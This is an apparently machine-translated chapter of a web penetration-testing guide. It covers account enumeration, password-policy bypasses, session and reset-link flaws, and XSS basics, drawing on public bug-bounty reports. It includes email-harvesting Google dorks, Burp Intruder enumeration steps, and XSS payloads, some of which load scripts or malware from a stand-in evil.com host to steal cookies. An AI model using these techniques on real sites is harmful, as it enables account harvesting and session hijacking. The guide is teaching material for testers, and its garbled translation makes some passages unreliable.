protection-at-asus-vivo-baby-and-hivivo-for-android-that-could-result-of-Several-security-issues /
• Weblate - Bypassing Brute Force Protection by Changing the IP Address:

Weather | 109
11. CHECK FOR ACCOUNT (LOGIN) enumeration
For the majority owner of the application, the account (login) is a matter that must be protected so that
is expected to not be enumerated by unauthorized parties. One reason was
quite simply, because they want to "complicate" the execution of examiners in gaining access to
in a designated account.
This in itself is quite in line with one of the discussion related to "why the account and password"
which was submitted in the "Brute Force", the account is one of the important factors
necessary to "permit the" tester can hack into the system.
Under the relevant considerations, the Guidelines also presents a few steps
to do, to enumerate over the account (login) in an application.
11.1. Common Log Identity at Applications
Login execution processing in the application consists of several types which must be seen
of the function of the application itself. Several examples are applications that are circulating are:
• An application of personal nature (or perhaps it can be said as an application without
interaction), such as company profile or personal blog. In this condition, usually
account for login can be either a username (unique user name) or email address.
It is often used in relation to this is like Wordpress CMS that already have arrangements
of its own so that the username can not be seen from the public area.
• The second type is an application that has the nature of a social network (allowing users
to interact), such as forums or social media such as Yammer, Facebook, and
more. In this condition, usually the user can login with a username only, email, or
maybe both.
• The third type is an application that are closed as Corporate Banking. In condition
This, the user generally must come to the owner in advance and submit application
a number of documents for purposes can then proceed to login. As for his or her login
Common use username (unique name of the user).
With such a basic overview so, then of course it can be concluded that the pattern of execution
attacks that can be done will vary. For example, when there is an application
which opens directly username and allow users to log into the application
with the username in question, then of course when the context of the discussion will

Weather | 110
referred to the way of obtaining the email addresses of users of existing or possible ways of doing
Brute-force into it.
Similarly, if it turns out an application does not "allow" users to find out the name
Unique another user (username), then the execution enumeration account will allow for
run. Nevertheless, it remains must be the primary account that this issue is very visible from the
each owner's policy or regulations governing the application.
11.2. Basic Account Enumeration
11.2.1. Enumeration account via Login Form - Veris Case
One of the basic things that can be done by an examiner is linked by trying
enter your email address (either email her registered email or other known
may exist in the application) on the login form followed by entering a password in origin.
The goal is quite simple, namely to see the message displayed by the application when
The experiment failed. Here is one example of execution:
Figure 130 Input the Email at Login Form
When an application is vulnerable to execution "account enumeration" is, then there is
an application will provide a "response" of the information will be valid whether or not a username
included.
For example, when victim@victim.com entered a valid value (but the word
the password is incorrect), then the application is vulnerable to state that the entered password is
wrong. Vice versa, if it victim@victim.com This is not valid, then the application
vulnerable to state that the username is not found or invalid username.

Weather | 111
Here is an overview of an example of the results login with an account that is not listed in the
application:
Figure 131 Invalid Username - Failed Response
With the provision of such information, then the examiner will be able to automate the enumeration
Referred to send a request to an intruder in burpsuite mode accompanied by
enter the email list are suspected to exist in the application.
Additional references: issue like this is found by a researcher with the nick zuh4n
Veris's application , At that time, Veris "provide" information such as " User is not Exist "when
given a username wrong, and " Password does not Match "When the password is entered
is not appropriate.
11.2.2. Account Enumeration via Forgot Password Feature - Infogram Case
There are times when a login form has been protected so well that it does not allow a
examiner to conduct an enumeration of the accounts listed. However, there
measures commonly used to bypass this protection, that is by doing
enumerating through the "forgot password".
One example of this execution is as has been done by a researcher with
10098 saikiran nick successfully perform enumeration of the registered account via forgot features
password , At that time, the application Infogram not provide protection to the features mentioned
making it easier for an examiner to be able to obtain an account belonging to a user
by brute force.

Weather | 112
Just as the discussion that has been submitted to the previous point, to re-automate
enumeration activities (after it was found the vulnerable endpoints - such as the forgot password
this condition), then the tester can throw the request referred to intruders and enter list mode
emails that allegedly listed in the application.
11.2.3. Account Enumeration via Resend Confirmation Feature - Xoom Case
Another step that can be used by examiners to conduct an enumeration of the account that is
by utilizing features "resend confirmation". This feature is basically used for
sends back an activation link to the email address registered so that the user will
can activate against his account. However, improper implementation,
will certainly make this feature fruit becomes an issue.
One example is like the issue that was found in the application Xoom (a PayPal company).
By default, the Xoom has provided protection to the application so that users can not
enumerate both the login form or the sign up process. However, it turns out feature
"Resend confirmation" of its still somewhat vulnerable to allowing a
testers to be able to enumerate to the email address registered in it.
In execution, a registered e-mail that has been activated in the Xoom will not be able to obtain
the activation link again. Error displayed by any application information charged that "the account has been
activated ". Reflecting this situation, of course, the testers also can take advantage of such information
to obtain active accounts that exist in the application Xoom.
In the implementation, testers only need to use the "resend email" available at
application.
Figure 132 Resend Email Feature

Weather | 113
Steps being taken is quite simple, namely testers are required to obtain HTTP Request
of features "Resend mail" intended for later use with the purpose of enumerating email
which may exist in the application.
Here is an example HTTP Request from the existing features:
POST / bex-v1 / users / resend-signup-mail HTTP / 1.1 Host:
www.xoom.com
User-Agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10:11; rv: 53.0) Gecko / 20100101 Firefox / 53.0 Accept: text / plain, * / *; q
= 0:01 Accept-Language: en
Content-Type: application / x-www-form-urlencoded; charset = UTF-8
X-Requested-With: XMLHttpRequest
Referrers: https://www.xoom.com/request/signup-confirmation Content-Length:

32
Cookie: <some_of_cookies_overhere>
Connection: close
e-mail = Circle.idts2% 40hotmail.com
As can be seen, by sending this request to the intruder in burpsuite and continue with
highlight the email parameter "equipped" with the email list, then the enumeration process was
will be executed automatically.
Afterward, testers need only look at the response length resulting from the application.
Figure 133 Account Enumeration Process via "Resend Confirmation Email"
In this condition, when the response length worth 571, then the account is otherwise no. but when
worth 406, the account is declared absent or has conducted activities.

Weather | 114
Figure 134 Account not Found - Invalid Email
11.2.4. Account Enumeration by Using Search Engine - Xoom Case
As is common knowledge in the sign-up feature, the app will surely provide alerts to
when users want to register with a registered account. Usually,
These alerts will be information such as: "your account has been registered" or the like. But when
seen from the other side, of course, this sort of thing will lead to the potential success of a
testers to be able to enumerate the massively against a registered account in the application.
In the implementation of prevention, there are several ways that the developer uses
to anticipate this sort of thing, which is like the use of CAPTCHA. Another example that is often
used in addition to installing a CAPTCHA is to provide a kind of soft-tokens only
valid for one request. The goal is quite simple, namely that an examiner would not be
be able to automate the enumeration activities only with a soft-token value only.
On the application Xoom (a PayPal company), they do differ in their approach to prevent
the enumeration process at the sign up. In this condition, when an examiner wish to register
an email on the Xoom, both not yet or already registered, Xoom will continue to give
the same response that does not look "success" in addition to the registration process with a view
directly on the email you registered with.
• When an account is not registered, then the application will send you (via email) a kind
a unique link that can be used to activate the existing account.
• As for when an account has been registered, the application will send you (via email as well)
a kind of information that there is a registration trial account on the email address in question.
The essence of simplicity, no action has to be done from when the account owner email
hers has been registered beforehand. But from the standpoint of the testers, they were "impressed" not

Weather | 115
earn nothing.
In this condition, it can be seen that when there is an enumeration prevention account, it can be
said that an account is a matter that spelled out "should be kept secret" from the viewpoint
the company in question.
Reflecting on the situation in question, it is one of the ways that can be done by testers
enumerate account is to use search engines as it has been
delivered generally in the "Information Disclosure via Search Engine".
Armed with some dork, then Registered user's email address in the Xoom was finally able
enumerated by "good" ,
site : xoom.com AND inurl : '@ gmail.com '
site : xoom.com AND inurl : '@ yahoo.com '
site : xoom.com AND inurl : '@ hotmail.com '
site : xoom.com AND inurl : '@ msn.com '
Here are some results of the enumeration has been done:
Figure 135 Information Disclosure via Search Engine - Email Enumeration
Figure 136 Information Disclosure via Search Engine - Email Enumeration

Weather | 116
In a more specific conditions, of course, it is better to use Google Dork also
involve parameters that have content "email" is.
As simple information, Xoom has a link to "referrer" program as follows:
http://refer.xoom.com/micro/expired_link?f=Complete_Name& e = email@address.com & l = Another_N
ame & tellapal.id = Some_of_Token
From this link, then of course you can add a few more parameters for input early Google Dork
as part of the activities enumerated. As exemplarily are as follows:
site : xoom.com AND inurl : ' e = '' refer '
site : xoom.com AND inurl : ' tellapal.id '
Thus, the email addresses of users of the application (application vulnerable) was
will be obtained with the use of Google Dork testers.
11.2.5. Enumeration account via Sign Up Feature - HackerOne Case
Previously discussed regarding the prevention of enumeration is done by developers on
sign up by utilizing the features of the implementation of soft-token that can be used as much as
one for one request.
As for when an application does not have a soft-tokens or other precautions, then the examiner will
can be used to enumerate and see the response generated
as has been described in previous sections.
One example of execution in this regard, namely finding of a researcher with nick
dawidczagan in the program belong to Hackerone , At that time, Hackerone been doing prevention
enumerate account via the password reset feature and the login form. However, the process
Hackerone belongs registration still possible for the testers to enumerate.
However, this is not an issue from the standpoint Hackerone risky at the time because
they have an internal considerations in dealing with this case.
11.3. Reference Check for Account Enumeration
Execution account enumeration and related prevention it is certainly not limited to those
was submitted in this guide. However, it is expected to be a picture
for the testers to be able to know that every flow that exist in applications that have
relation to the account, at least have little possibility to be used in

Weather | 117
execution embodies enumeration. Some examples are as enumerate through
Extra features of the account (as in one case in Weblate found atruba) or
by exploiting vulnerabilities associated IDOR (to be described later on the concept IDOR).
can be checked for discussion related reference account enumeration:
• OWASP Testing Guide - Testing for User Enumeration and guessable User Account:
https://www.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Accou
nt_ (OWASP-AT-002)
• About User Enumeration: https://blog.rapid7.com/2017/06/15/about-user-enumeration/
• [Infogram] User Enumeration via Forgot Password Feature:
• [Veris] User Enumeration via Error Message at Login Form:
• [Hackerone] Enumeration of Users via Registration (Sign Up) Feature:
• [Weblate] User Enumeration when Adding Email to Account:
• [Xoom] Account Enumeration via Search Engine: http://firstsight.me/2017/12/information-
disclosure-at-paypal-and-Xoom-paypal-acquisition-via-search-engine /

Weather | 118
12. COMMON ACCOUNT AND CHECKING PASSWORD
This section will be one of the easiest parts of the test. As for the specifics,
This section is actually more likely in the examination policy that has been applied in a
apps such as password length setting, regulating the use of passwords
complex, the age of the password, and the like.
While this will not be too often accepted in the industry, however, this guide
fixed load because there are still some types of companies that consider this as
concern.
Note: Since this test categories included in the category that quite easily, then this section is not
will load a lot of screenshots related to the execution of existing.
12.1. Password Complexity Checking
The complexity of a password can certainly be of particular concern in the mechanism
the making of an account. In the best practice, which is quite good password must be at least
has a combination of lowercase letters, uppercase letters, and numbers. As in most other opinions,
symbol becomes a necessity of its own to be used in combination there.
However, there is another condition that indicates that a password be calculated
complex, which during this complexity itself does not belong to the category of the weak. As
For example, P @ ssw0rd a password that has a perfect mix of characters, namely
their use uppercase letters, lowercase letters, numbers, and symbols. However, this password can not be
hold onto weak due to its characteristics (as known by many people).
Based on the consideration that there are complex in this case would be more appropriate if the password
is not classified as a weak password / common passwords, and would be even better if
belong to a password that is difficult to read with the naked eye.
12.1.1. Password Complexity Check via Registration Feature
The easiest thing to do these checks is to conduct the registration process
generally freely available. In the implementation, testers simply enter one character
or using only lowercase letters as a password. When the server receives this, it can be
ensured that the application is not related to password complexity policy apply.

Weather | 119
12.1.2. Password Complexity Check via the Change Password Feature
Was it when the password complexity at the registration feature has been applied to the issue related to it
This is not possible anymore be found on the intended application? The answer is not necessarily.
This in itself can be seen from one write-ups issued by a researcher with
nick wdem (Walentin Helling) on the program belongs to ownCloud , On that occasion, wdem
shows that the password complexity policy that has been applied by ownCloud (eg
when registering), can be "bypassed" by using the change password feature
available. The thing that is done by him is to change his password to "q" (one
Any character who would have entered the category is not complex).
Figure 137 Simple Step that conduct by Wdem
12.1.3. Password Complexity Check via the Change Password Feature from Reset Password
A researcher with japz nick managed to find a unique step in the bypass
the change becomes complex password on Legal-owned program Robot , As stated in
descriptions, in execution, japz use the password reset feature in advance that
then followed by entering a new password that is not complex.
Figure 138 Password Complexity is not Implemented at Change Password from the Password Reset Feature

Weather | 120
12.1.4. Password Complexity Check via the Used of Specific Characters
There is a case that is quite unique to the complexity of the examination of a password.
It can be seen from the write-up released by a researcher with the nick rpkumar
Legal owned program Robot ,
On that occasion, actually Legal Robots have to apply the formula to hold a
users to create passwords that are not complex, but nevertheless, succeeded rpkumar mem-
Her bypass using only the eight characters "space" sequentially.
Figure 139 Bypass Password Complexity with Empty Spaces
12.2. Minimum Password Length Checking
In addition to complexity, which is generally considered in the testing is the provision
The minimum length of the password use. Best practice, the minimum valuation for long
this password is quite varied, the length of 7 (seven), 8 (eight), 12 (twelve), or maybe more.
So, there are no separate requirement to use the reference "longest".
The test itself is not much different from what has been described previously, namely
• Registration via Feature examination;
• Examination via the Change Password Feature; and
• Examination via the Change Password Feature from Reset Password
One example that can be brought back in this regard is when japz successfully bypass
minimum password length of 8 (eight) characters into six (6) characters through the use of
the change password feature derived from the password reset.
Figure 140 Bypass Minimum Password Length Policy

Weather | 121
Figure 141 Bypass the Minimum Password Length Policy II
Need to be a simple note that with the length of a password
implemented in an application, then at least it will be increasingly difficult for
Attacker to be able to guess (eg with attack bruteforce) password
used to enter into related applications.
12.3. Minimum Password History Checking
This part is pretty much debated because there are two points of view
Different, namely:
• The first thing that is more to do on its negative side. Save password (in the form of
history) will only further augment considered sensitive issues in the database. When
This system is hacked, then it implies that an attacker would gain "more"
sensitive issue because there is a password which amounted to more than one to a single user.
• The second thing that is related to the positive side. For example, a system has implemented
Maximum time change the password that is for 30 (thirty) days, then there may be restrictions
login attempt as many as six (6) times, and have applied for a temporary lock 30 (three
twenty) minutes. When brute force is the only way that is owned by the attacker, then
an attacker "just" can try around 8640 (eight thousand six hundred forty)
combination within a period of 30 (thirty) days in question.
Regardless of the pros and cons that are owned, then this guide will try to talk briefly
(Remember not to be too hard) will be things that exist.
Of course, a tester who already have an account (whether the account was given by the company
and the account was acquired by registration) can try to turn the password on
related features are available. When it has not reached a certain point (eg, four times in accordance with
reference to PCI DSS) but was able to change the password, then of course it will be
the findings of its own.
However, keep in mind that not all companies will implement this policy in view of
they basically have a separate consideration from both business and technical side.

Weather | 122
12.4. Maximum Password Age
Just as before, not all companies will implement this policy in view of
there is a separate consideration.
Apart from the consideration that there is, this reference point is a point that is quite difficult
to be proved directly from the front end because it will take that course views
in terms of implementation. However, for an examiner who has direct access to
database, then he will be able to try to change the time to make the turn words
password to be working or not an age limitation feature password.
Technically, this time change can also be seen from several conditions:
• That changed the last time the change password so testers just have to wait
(For example) a few minutes to get the answers will work whether or not a feature.
• Or change the rules on the application, with a record of it is available on a dashboard,
not change a code is direct;
• And of course there are many other ways that creative or unthinkable when this guide
created.
As for the time limit, the examiner can see some of the standards as it has been
issued PCI DSS (90 days) or Microsoft (between 30 days to 90 days).
12.5. Change Password for the First Time Use
This point will probably be one of the points with the shortest explanation.
Technically, this point itself is not intended to systems that let users
to register themselves. As for the right circumstances to implement existing points
ie when a property of a user password, generated from the other party as a
administrator, customer service, or other.
12.6. Reference for Common Account and Password Checking
In order to expand the existing insights related to this, the following are some
references that can be checked for references related to the discussion of common account and password
checking:

Weather | 123
• [OwnCloud] password complexity not enforced on password Change:
• [Legal Robot] Bypass 8 chars password complexity with 6 chars only due to insecure passwords
reset functionaliy: https://hackerone.com/reports/173195
• [Legal Robot] Password Complexity ignores Empty Spaces:
• Authentication Cheat Sheet by OWASP:
https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html

Weather | 124
SESSION MANAGEMENT
MECHANISM

Weather | 125
13. SESSION MANAGEMENT
It is undeniable that the session is a matter that is enough to attract attention many testers
to be able to reach it. Another reason was not due to allow for someone to
enter into an account without the hassle of guessing passwords
used by each registered account.
Before going further, testing of this session have some wrong moves
Her one relating to the points "Insecure Direct Object Reference (IDOR)". However, the guide
This will specifically separates IDOR to be a sub-chapter of its own so as not
confusing when entering into any discussion.
13.1. Session is not Expired - Hackerone and WakaTime Case
Best practice, a session has ended (either because it has met the idle time period
or because certain users have exit / logout of their accounts) should not be
used again. However, in reality, there is no doubt that there are still developers
missed to implement the best practice is, especially for a newly released application.
Some are examples as has been shown by a researcher named
satishb3 (on the program in 2013 Hackerone ago) and pratyushjanghel (Reviewed in WakaTime program
2017 ago) ,
In the execution, the examiner only needs to capture a valid request (in our login)
and learn about the state of his response. The details are as follows:
• Logged into a valid account;
• Go to the menu that can only be accessed by an authorized account (in this case
can form his own profile page);
• Then the "capture" request from the previous point and send it to a "repeater" in burpsuite (remember
back on the steps of the learning associated sub-chapter "Burpsuite - Repeater Mode"
which has been described previously);
• After that, logout of the application;
• Then send back the request that has been captured and placed in the "repeater". For
sure, the delivery of this request can be accompanied by some changes in the data. when data
changes, the related issue "session is not expired" exists on the application being tested.

Weather | 126
Should be noted that, in most forms of testing, the session is not expired can
also "applicable" in the period of time (such as 15 minutes).
13.2. Cookies Attribute Setup is not yet
13.2.1. Few Words about using cookies to Login
Is it possible if someone logs in (and obtain authorization) of a
application? The answer is certainly yes, it's possible.
In short, every user who has obtained the authorization will obtain a cookie
whose role is to "remember" any active activity is being carried out by the user. dinukil
from Wikipedia, Cookies are also used to remember pieces of information
previously entered by the user into a form, such as a name, complete address, password,
as well as data such as credit card numbers.
Seeing this condition, it can be ascertained that an attacker who has successfully
take an active cookies from a user, will be able to perform activities such as
legal users. To overcome is there, then the developer also implements some
things that can be used to protect the theft of a cookie.
In order to simplify the explanation, the authors will take an interesting article
has been described by Dawid Czagan regarding " Securing Cookies with HttpOnly and secure Flags " ,
13.2.2. Few Words about "Secure" Flag / Attribute at Cookies
In the same article, explained that the "secure" flag on the cookies necessary to "force"
so that a cookie is only sent via HTTPS only though an application can also be run in
HTTP area. Thus, these cookies become "illegible" albeit an Attacker
try to make sniffing.
13.2.2.1. Check for "Secure" Flag at Cookies Attribute - IRCCloud and Gratipay Case
Some examples that can be presented in this section are as vulnerabilities reported by
researcher with nick eronx (on the program in 2014 IRCCloud ago) and researcher with nick
staytuned (on the program in 2015 Gratipay ago) ,
Now in its implementation, testing of this is fairly simple. an examiner

Weather | 127
only need to "login" in advance into an application (thereby obtain authorization) and
see the flag that is active in the cookies by using the built-in features such as "web
developer "either Firefox or Chrome or using extension "Edit this Cookie"
developed by editthiscookie.com , Here is an example of the examination
use related extensions:
Figure 142 Executing "Edit This Cookie" Extension
Figure 143 Cookies Attribute at Hackerone

Weather | 128
13.2.3. Few Words about "HTTP-Only" Flag / Attribute at Cookies
Still referring to the article belong to Dawid Czagan. There is an interesting question that could be asked
to open this part: " If a cookie has been transmitted only on the path to HTTPS, then what
the purpose of existence flag 'HTTP-Only'? "
The answer had been properly answered. In reality, the techniques to steal these cookies
it is not limited to the eavesdropping activity (one of which is sniffing). In this case,
an attacker could exploit vulnerabilities such as XSS (Cross Site Scripting) which is in
applications to steal an active cookies.
In anticipation of this, an application can implement the use of flags HttpOnly
Reviewed Attribute Cookies. With this execution, then a javascript (which utilized through
execution XSS) will not be able to read the cookies activated from a user.
13.2.3.1. Check for "HttpOnly" Flag at Cookies Attribute - Qiwi and Concrete5 Case
Some examples that can be presented in this section are as vulnerabilities reported by
researcher with nick pradeepch99 (on the program in 2015 QIWI ago) and researcher with nick
tomdev (on the program in 2016 concrete5 ago) ,
Just like the previous step, a tester can use the browser extension
such extensions "EditThisCookie".
Here is a screenshot of proof of pradeepch99 in one application
Qiwi owned at that time has not flag "HttpOnly" (and including yet
provide flag "Secure").
Figure 144 Cookies Flag / Attribute is not yet setup

Weather | 129
13.3. Unexpired Reset Password Link
In accordance with the name of their vulnerability, these points are divided into four sections outline, namely:
• Reset Password Link never expired although has never been used in a long time;
• Reset Password Link never expired although it has been use;
• Reset Password Link unused from an email account, not expired even though
a user have used reset password link "coming later";
• Reset Password Link unused from an email account, not expired despite a
e-mail accounts that have been replaced of its original value.
This point is also fairly relatively easy to execute, but returned to common problems
which were also presented at some point earlier, not all programs can receive issue
This related. It is not others, due to the presence of attack vectors that can be quite difficult
to "filled", for example:
• An attacker must first hacked accounts belonging to users to be able to find
"Value" full on a password reset link; or
• An attacker might come from the internal manage database
immediately so that they can see the value of the token directly to be able to use it
illegal.
However, to complete a thorough discussion, then this guide was still
will provide an overview of the issues there.
Before leaving for further discussion, it should be noted that the "Reset Password Link"
is meant here is a link that contains a unique token in it.
13.3.1. Unexpired Reset Password Link - Never Use - Veris
Best practice, a unique link that is used to reset the password to a
account should expire. For example, there are some rules on an application that
reset password link is only valid for 24 (twenty four) hours. So, if this new link
be used in over 24 hours, what happens is the link referred to expire (expired)
and the user is required to request a re to be able to return reset his password.
At last in June 2016, a researcher named Itly find related issue is the program belongs
Veris , Technically, Veris has a policy that the password reset link can only be used in

Weather | 130
period for 30 minutes. But in fact, it turns out the link in question can still be
used although it has reached 2 hours.
The execution step is quite simple, namely:
• Did request a new password by using the password reset feature;
• When the link with this unique token to the user's email, then wait until the deadline
certain. Say if the limit is 30 minutes, then use the token after (for example)
reaches 1 hour.
13.3.2. Used Reset Password Link is Never Expired - WakaTime Case
The opposite of the previous point, on this side, problems arise when a password reset link
which has been used, it can be reused. In other words, a unique link has no future
expired and no provision limits the use (so it can be used repeatedly).
On one of the activities in searching for a bug, a researcher named
mohammad_obaid have managed to find issue This related to the program WakaTime.
The execution of this step is also fairly simple, namely:
• Did request a new password by using the password reset feature;
• Use the password reset link to an email to the user, to replace the old password
to a new password;
• Afterwards, reuse the password reset link was to re-change the password. When
can still be used, then the application is vulnerable to this related points.
13.3.3. 1 st Reset Password Link is not Expired after use the 2 nd Link - Few Cases
For the third part, the discussion will be pursed in the still active reset password link
even if a user has not used a password reset link has been using the latest for
replacing his password.
Sounds a bit difficult, but the concept is simple:
• A sufficient testers did request a password reset link twice (so
produce token1 and token2).

Weather | 131
• Then, testers directly using a password reset link the latter come (in the case of
This is token2) to change the password.
• Thereafter, the re-use token1 to change the password again. if it turns out
score token1 This still works, it means that the application is "vulnerable" to the pattern on points
this.
To make a picture of this point, the release of some researcher like this
can be a reference of its own, namely geekninja ( the program Infogram ), Hk755a ( on
Yelp program ), And mohammad_obaid ( the program WakaTime ).
13.3.4. Reset Password did not Expired after Changing Email Address - WakaTime Case
In this section, the problem will be referred to the reset password link that is not expired even though
someone has changed his registered email.
Why is this a problem? Because in general, a password reset link to be
propped on a specific email (which must be combined with various
Another formula). When the time a user has to replace his email but can still be
replacing the password with a password reset link from the previous email, then it would be
a separate issue.
This is in line with one write-up released by a researcher named silv3rpoision
the program WakaTime , Although email has replaced the first, can still silv3rpoision
use a long password reset link to change his password.
The steps required to execute this issue is also fairly simple, namely:
• Make a password reset request to the email account with the beginning (say EMAILA);
• Then, change the email on the account becomes EMAILB;
• Afterwards, use a password reset link generated on the first point to replace the word
The associated account password. If it still can be used, then it can be a issue.
13.4. Reference for Session Management
In order to expand the existing insights related to this, the following are some
references references that can be associated discussion session management:

Weather | 132
• Securing Cookies with HttpOnly and Secure Flags:
https://resources.infosecinstitute.com/securing-cookies-httponly-secure-flags/#gref
• [HackerOne] Session Expired not on Logout: https://hackerone.com/reports/353
• [WakaTime] Session Expired not on Logout: https://hackerone.com/reports/244875
• [IRCCloud] Unsecure Cookies, Cookie Secure Flag not set: https://hackerone.com/reports/6877
• [Gratipay] Cookie Does Not Contain The "secure" Attribute:
• [QIWI] Session Cookies without HttpOnly and Secure Flag Set:
• [Concrete5] HttpOnly flag not set for Cookie on concrete5.org:
• EditThisCookie Extension for Google Chrome:
https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg
? Hl = en
• Details of HTTPOnly from OWASP: https://www.owasp.org/index.php/HttpOnly
• Details of the Secure Flag from OWASP: https://www.owasp.org/index.php/SecureFlag
• [Veris] Unused Reset Password Link is not exceeded after the Expired Expired Time:
• [WakaTime] Used Reset Password Link is Never Expired: https://hackerone.com/reports/244642
• [Infogram] 1 st Reset Password Link is not Expired after use the 2 nd Link
• [Yelp] 1 st Reset Password Link is not Expired after use the 2 nd Link
• [WakaTime] 1 st Reset Password Link is not Expired after use the 2 nd Link
• [WakaTime] Reset Password Link did not Expired after Changing Email Address

Weather | 133
INPUT VALIDATION

Weather | 134
14. CROSS SITE Scripting (XSS)
XSS (Cross Site Scripting) is a type of vulnerability that is quite often found in
The web based application. In general, this vulnerability is by its very nature have an impact on the
client who usually executed by injecting javacsript or HTML code.
Statistically, XSS is one type of vulnerability is quite popular. This in itself can
seen from the data report the OWASP Top 10 which shows that XSS ranks A7 ,
then, according to Rapid7 through one whitepaper released, Cross Site Scripting occupy
The first rank in Q2 2018 ,
Figure 145 Statistic of XSS (OWASP and Rapid7)
XSS attacks occurred because of the use of vulnerability contained in an input validation
application is not run well "who supported" by the output reflects
The input directly. In other words, this kind of vulnerability can cause the attacker to
enter the code (such as JavaScript) that can be enabled to undergo an execution
dangerous.
<Script> location.href = "https://www.evil.com/malware.exe"; </ script>
In reality, the impact resulting from XSS attacks is fairly varied and
have varying levels of risk. Some of them are as attacker
take cookies or tokens belonging to the victim to get login access, forcing victims
visit a site "dangerous", and make victims download malware.
Technically, XSS has three types of attacks that consists reflected cross-site scripting, stored cross
scripting, and DOM-based cross-site scripting. Each variant must have a way
eksloitasi a little different and has a different risk levels.

Weather | 135
14.1. Kind of Cross Site Scripting
14.1.1. Reflected Cross Site Scripting
In this type, the execution of scripts that are input-kan by the attacker is not stored on the database. in
Specifically, these attacks often occur in the HTTP GET method. Because it is not stored
in the database, then of the impact to the user will be "produced" indirectly. By
therefore, to determine the success of this attack, the attacker needs to combine with
such as social engineering attacks. Here is an example of related code search feature
vulnerable to XSS attacks:
<? Php
$ Find = $ _ GET [ 'search'];
echo "Search". $ Find. "Most";
?>
Consider the example code above, any data entered through the GET method will be at capacity on a variable
"Search". Data were collected on this variable will be processed without going through the stages of validation and
filtering. Afterwards, then the data is displayed using the echo command as it is.
Under these conditions, then this will cause a reflected XSS attack can happen because
lack of validation on the input and output. Then how to make these attacks appear
"Functioning" while nature is not stored in the database?
As mentioned earlier, this attack needs to be combined with the type attack
social engineering. To facilitate, then take a look at the following simple scenario :
• There is a vulnerability in the site xyz.com with named parameters p1 vulnerable to
reflected XSS attack. Normal full links and is located at: http://xyz.com?p1=hello ,
• On this occasion, the testers tried to enter a simple script form < img src = x
OnError = http: //evil.com/attack.js> which is placed on the parameter p1.
• Thus, the full link that has been injected will be changed to:
http://xyz.com?p1= "> < img src = x OnError = http: //evil.com/attack.js>
• When the link is visited, then automatically, the visitor is going to
executes a script that is on attack.js ( which of course can be varied functions
in accordance with a predetermined function).

Weather | 136
• Given that this link is a link-custom and are not stored in
database, then certainly necessary "step" to be able to make additional victims executed.
In this case, there are additional steps that generally revolve around the social engineering as
send a link to "complete" it via chat messaging, put it on the forum / social media,
email, and more.
Figure 146 Sample of Attack - Reflected XSS via Malicious Email
• If the victim is in a state log on the web xyz.com (and let's say that attack.js
is a script to pull the cookies), then there is the victim cookies can be taken
over by the attacker so that it can be used to login without a username and password.
Note: Image taken from blog shieldfy.io ,
14.1.2. Stored Cross Site Scripting
Unlike previously, in this type, the execution of script in the input-kan by attacker will
stored in the database (because of the "saved" this so-called "stored"). Sample case
which often happens in these situations, usually the attacker will perform the injection in the form of malicious code
the input feature which has a function to store the data and then wait until
Another user (in this case the victim) to find the output from an input-referred.
Technically, the following is one example of vulnerable code associated Stored XSS. The
examples of features that were taken in this example is the comment feature:

Weather | 137
<? Php
// process the stored data to the database
$ Name = $ _ POST [ 'comment'];
$ Kemontar = $ _ POST [ 'comment'];
$ Store data = $ mysqli-> query ( "INSERT INTO tb_komentar (name, comment) VALUES ($ name, $ comment)");
// process of displaying data to a web page
$ Result = $ mysqli-> query ( "select * from tb_komentar");
echo "Koemntar". $ Results-> result (). ";
?>
In general, the comments feature is composed of two parts, namely the form of comments and page views
of comments. Form comment function to receive input from the user. The data from
users will be stored on the database. Then on the other hand, the page view comment
a page that is enabled to display the comments users
retrieved from the database.
When viewed in more detail, it can be seen that the data stored in the variable name and
comment on the above code does not do filtering and validation. If the attacker entering
malicious code via the comment feature, which occurred malicous code will be stored in the database
and will be shown on the comments page. Thus, the execution of Stored XSS will
in line with expectations. In this situation, each user that accesses the comment feature,
it will automatically access the malicious code that has been inserted.
For simplicity, the following are examples of flow of stored XSS attack
is specified to take the cookies of other users:
• Attacker inject malicious code on one particular website features (for example, features
comments as explained earlier).
• When visitors visit the site in question, then there malicious code to be executed
on the visitor side. This will certainly lead to a cookie on the visitor will be sent to
attacker automatically to the side of the attacker.
• When the cookie is successfully retrieved, the worst effects are the attacker is able to
use it to login without the need to require a username and password from
visitors referred.

Weather | 138
147 Pictures Stored XSS Simple Explanation
Note: Picture taken from Imperva blog.
14.1.3. Dom-Based Cross Site Scripting
Taken from the information that has been submitted by PortSwigger, briefly, Dom-Based Cross
Site Scripting (XSS Dom) is a type of XSS that appear due to an application
which has a client-side Javascript which processes data from a source that is not
reliable in a form that is not safe. In summary, the execution will take advantage of client-it
side scripts that exist on the client side itself.
Quoting from Netsparker about Dom XSS , Say that there is an application that
has the following script:
<Script>
document.write ( "<b> Current URL </ b>:" + document.baseURI);
</ Script>
Based on the above, if a tester sends a request with an additional injection of such
following: http://www.xyz.com/test.html# <script> alert (1) </ script> , then what happens is pop-
up alerts to be executed automatically.
Should be noted that the alert (1) It will not appear when viewed with the view-source. The
the reason for all this is happening in the DOM (Document Object Model) and alert (1)
Javascript is executed by existing.

Weather | 139
Figure 148 Sample Flow of Dom-Based XSS
Note: Picture taken from the writings of Christopher Makarem which also explains in detail
about Dom-Based XSS ,
As the impact of which has been described in the previous section in Reflected and Stored XSS, execution
DOM XSS vulnerabilities can also be used to steal cookies from a user's browser or
change the behavior of the page on the web according to the desired application. Here is an example
an overview of DOM XSS attacks.
14.2. Basic Concept of Cross Site Scripting Attack
In general, an examiner is required to seek an input and output features on a
can launch an application for XSS attacks. Some examples of features that have input and
outputs generally like the search feature, the comments feature, chat, ticketing features, and the like.
Furthermore, the thing to do after finding features in question is to
provide input in the form of basic XSS payload to perform (for example) pop up alerts. Some
payload that is often used in testing XSS in the early stages are as follows:
1. <Script> alert ( 'xss'); </ script>
2. <Img src = x OnError = alert ( 'xss')>
3. <Svg onload = alert ( 'xss')>
4. <Iframe src = "javascript: alert ( 'xss')>
Javascript: alert ( 'xss') //

Weather | 140
When these payloads are executed, then a vulnerable application would result in a
simple as the following:
Figure 149 Pop-Up Alert Sample
In the implementation, of course there are a lot of payload that can be used, especially if
it takes some specific characters in order to bypass a variety of types of protections
applied to the application. Here are a few references payloads that can be
a reference to:
• https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html
